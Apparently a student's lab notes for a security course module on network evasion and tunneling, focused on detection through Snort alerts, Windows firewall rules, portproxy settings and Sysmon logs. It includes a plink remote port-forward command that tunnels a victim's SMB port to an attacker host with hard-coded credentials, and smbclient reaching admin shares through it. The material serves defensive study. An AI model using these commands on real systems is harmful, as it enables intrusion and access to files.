Module 14: Network Evasion and Tunneling

Network Segmentation

Network Segmentation Concepts and Benefits

Concepts. Google/Wikipedia it.

Segmentation Theory

Concepts. Google/Wikipedia it.

Egress Busting

Detecting Egress Busting

Snort alerts generated by the egress busting attack

offsec@snort02:~$ tail /var/log/snort/alert_fast.txt 
01/28-21:15:49.133529 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50167 -> 192.168.48.4:491
01/28-21:15:49.149038 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50168 -> 192.168.48.4:492
01/28-21:15:49.164680 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50169 -> 192.168.48.4:493
01/28-21:15:49.180393 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50170 -> 192.168.48.4:494
01/28-21:15:49.195977 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50171 -> 192.168.48.4:495
01/28-21:15:49.211640 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50172 -> 192.168.48.4:496
01/28-21:15:49.227126 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50173 -> 192.168.48.4:497
01/28-21:15:49.242844 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50174 -> 192.168.48.4:498
01/28-21:15:49.258451 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50175 -> 192.168.48.4:499
01/28-21:15:49.274751 [**] [1:10000006:0] "Malicious outbound traffic detected" [**] [Priority: 0] {TCP} 172.16.50.11:50176 -> 192.168.48.4:500

Port Forwarding and Tunneling

Port Forwarding and Tunneling Theory

Port Forwarding and Tunneling in Practice

Reading the Windows Firewall With Advanced Security/Firewall Event Log

PS C:\Users\Administrator> Get-WinEvent -FilterHashtable @{LogName = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall'} -MaxEvents 20

   ProviderName: Microsoft-Windows-Windows Firewall With Advanced Security

TimeCreated                     Id LevelDisplayName Message
-----------                     -- ---------------- -------
1/31/2022 10:03:01 PM         2008 Information      Windows Defender Firewall Group Policy settings have changed. The new settings have been applied
1/31/2022 9:58:43 PM          2004 Information      A rule has been added to the Windows Defender Firewall exception list....

Listing all the inbound firewall rules

PS C:\Users\Administrator> Get-NetFirewallRule -Direction Inbound | Select-Object -Property DisplayName,Profile,Enabled | Where { $_.Enabled -eq 'True'}

DisplayName                                                                                Profile Enabled
-----------                                                                                ------- -------
...
Cortana                                                                            Domain, Private    True
Network Discovery (Pub-WSD-In)                                                             Private    True
Network Discovery (LLMNR-UDP-In)                                                           Private    True
Network Discovery (WSD-In)                                                                 Private    True
Network Discovery (SSDP-In)                                                                Private    True
Network Discovery (WSD Events-In)                                                          Private    True
Network Discovery (WSD EventsSecure-In)                                                    Private    True
Network Discovery (NB-Datagram-In)                                                         Private    True
Network Discovery (NB-Name-In)                                                             Private    True
Network Discovery (UPnP-In)                                                                Private    True
Desktop App Web Viewer                                                     Domain, Private, Public    True
forward_port_rule                                                                              Any    True

Getting detailed information usin the rule name

PS C:\Users\Administrator> Get-NetFirewallRule -DisplayName "forward_port_rule"

Name                  : {F55666F7-6A7C-4049-BEE6-CD7407E7120A}
DisplayName           : forward_port_rule
Description           :
DisplayGroup          :
Group                 :
Enabled               : True
Profile               : Any
Platform              : {}
Direction             : Inbound
Action                : Allow
EdgeTraversalPolicy   : Block
LooseSourceMapping    : False
LocalOnlyMapping      : False
Owner                 :
PrimaryStatus         : OK
Status                : The rule was parsed successfully from the store. (65536)
EnforcementStatus     : NotApplicable
PolicyStoreSource     : PersistentStore
PolicyStoreSourceType : Local

PS C:\Users\Administrator> Get-NetFirewallRule -DisplayName "forward_port_rule" | Get-NetFirewallPortFilter

Protocol      : TCP
LocalPort     : 21
RemotePort    : Any
IcmpType      : Any
DynamicTarget : Any

Inspecting the configuration of the portproxy interface using netsh

PS C:\Users\Administrator> netsh interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
172.16.50.11    21          172.16.50.12    3306

Remote port forwarding using plink.exe

echo y | plink.exe -ssh -N -l kali -pw toor -R 192.168.48.2:1234:127.0.0.1:445 192.168.48.2

Confirming port forward is setup

kali@attacker01:~ $ ss -antp | grep 1234
 State     Recv-Q     Send-Q     Local Address:Port   Peer Address:Port     Process                                                                                                                                                                                                 
LISTEN    0          128        127.0.0.1:1234       0.0.0.0:*             users:(("sshd",pid=2801,fd=10))

Accessing the network shares usin smbclient

kali@attacker01:~ $ smbclient -L 127.0.0.1 --port=1234 --user=Administrator
Enter WORKGROUP\Administrator's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        htdocs          Disk      
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

Listing the Sysmon event logs while filtering for the plink string in the Message

PS C:\Users\Administrator> Get-SysmonEvent | Where-Object { $_.Message -like "*plink*" }

   ProviderName: Microsoft-Windows-Sysmon

TimeCreated                     Id LevelDisplayName Message
-----------                     -- ---------------- -------
2/1/2022 12:02:39 AM             1 Information      Process Create:...
2/1/2022 12:00:59 AM             5 Information      Process terminated:...
1/31/2022 11:47:42 PM            1 Information      Process Create:...
1/31/2022 11:47:34 PM            5 Information      Process terminated:...
1/31/2022 11:47:34 PM            1 Information      Process Create:...
1/31/2022 11:47:19 PM            5 Information      Process terminated:...
1/31/2022 11:47:19 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...
1/31/2022 11:46:12 PM            1 Information      Process Create:...

Getting detailed infromation from the Sysmon event logs

PS C:\Users\Administrator> Get-SysmonEvent 1 "1/31/2022 11:46:12" "2/1/2022 12:02:39" | Where-Object { $_.Message -like "*plink*" } | Format-List
...
TimeCreated  : 2/1/2022 12:02:39 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 1
Message      : Process Create:
               RuleName: -
               UtcTime: 2022-02-01 08:02:39.016
               ProcessGuid: {6c804c53-e91f-61f8-9b00-000000002500}
               ProcessId: 7592
               Image: C:\xampp\htdocs\simple_upload\uploaded_files\plink.exe
               FileVersion: Release 0.76
               Description: Command-line SSH, Telnet, and Rlogin client
               Product: PuTTY suite
               Company: Simon Tatham
               OriginalFileName: Plink
               CommandLine: plink.exe  -ssh -N -l root -pw toor -R 192.168.48.2:1234:127.0.0.1:445 192.168.48.2
               CurrentDirectory: C:\xampp\htdocs\simple_upload\uploaded_files\
               User: SERVER03\Administrator
               LogonGuid: {6c804c53-e8ec-61f8-069f-060000000000}
               LogonId: 0x69F06
               TerminalSessionId: 2
               IntegrityLevel: High
               Hashes: SHA256=828E81AA16B2851561FFF6D3127663EA2D1D68571F06CBD732FDF5672086924D
               ParentProcessGuid: {6c804c53-e8f5-61f8-8f00-000000002500}
               ParentProcessId: 656
               ParentImage: C:\Windows\System32\cmd.exe
               ParentCommandLine: "C:\Windows\system32\cmd.exe"
               ParentUser: SERVER03\Administrator
...

PreviousModule 13: Active Directory Enumeration NextModule 15: Windows Lateral Movement

Last updated 9 months ago